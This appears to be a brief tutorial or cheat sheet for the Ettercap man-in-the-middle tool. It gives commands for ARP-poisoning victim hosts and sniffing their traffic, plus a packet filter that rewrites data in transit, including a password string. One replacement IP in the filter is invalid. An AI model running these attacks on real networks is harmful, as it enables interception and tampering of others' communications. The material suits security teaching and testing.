Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
Basic Sniffing
# ettercap -Tzq -i eth0
To sniff traffic between 2 hosts:
# ettercap -i eth0 -Tq -M ARP:remote /victim_ip_A/ /victim_ip_B/
Capture traffic on a certain port only:
# ettercap -i eth0 -T -M arp /192.168.1.1 / /192.168.1.10-20/23
MITM
Filter example:
if (tcp.dst == 1234 && search(DECODED.data,"2016-10-03")){
msg("Match date...\n");
replace("2016-10-03","2017-10-03");
replace("118.186.71.134","111.222.33.444");
replace("PASw0rD","NOPassw");
}
Compile the filter:
# etterfilter -o POC.ef POC.filter
Launch ettercap:
# ettercap -T -q -i eth0 -F POC.ef -M ARP